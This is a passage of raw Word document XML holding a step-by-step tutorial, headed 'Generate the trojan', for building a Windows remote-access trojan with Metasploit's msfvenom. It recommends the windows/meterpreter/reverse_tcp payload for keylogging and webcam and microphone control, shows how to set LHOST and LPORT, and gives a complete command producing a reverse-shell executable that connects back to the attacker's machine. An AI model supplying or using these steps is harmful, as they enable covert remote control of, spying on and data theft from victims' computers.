        <w:spacing w:after="460" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gem install bundler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to install bundler, then type in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bundle install</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996"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If bundler is not the correct version, you should get a message telling you which version to install (in this case it was 1.17.3). Type in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gem install bundler:[version number]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and then type in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gem update –system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14"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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3"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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="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hd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To go back to the directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="180" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yzv0tz5bjv9a" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Choose our payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996" w:lineRule="auto"/>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Type in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:spacing w:line="36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msfvenom -l payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996" w:lineRule="auto"/>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to see a list of payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996"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We recommend using windows/meterpreter/reverse_tcp. It allows you to keylog, sniff for data, and control the infected computer’s file system, microphone, and webcam. It is one of the most versatile, invasive, and devastating payloads in metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996"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5943600" cy="1612900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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Style w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="180" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wfpnl0bpkd4w" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Customize our payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>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Now that we have our payload, we can check what options we have. Type:                                          </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom –list-options -p [payload]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2"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We see that LHOST is blank; this is where the exploit sends information from the infected device. In most cases, this will be your ip address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>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To find your ip address, type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:spacing w:line="36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ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:spacing w:line="360"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049">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Our ip address is our LHOST parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="180" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bosep6nvt76j" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: Generate the trojan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we have our payload, ip address, and port number, we have all the information that we need. Type :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p [payload] LHOST=[your ip address] LPORT=[the port number] -f [file type] &gt; [path]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1152525"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="69053" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600"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If you get the error like permission denied try this: </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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use sudo (if you have root privileges):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you have sudo privileges, you can try to run the command with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to grant the necessary permissions, type:</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rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.128 LPORT=4444 -f exe &gt; trojan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2) Change the directory to one where you have write permissions: If you don't want to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or don't have the necessary privileges, change to a directory where you have write permissions, such as your home directory, type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">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5A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
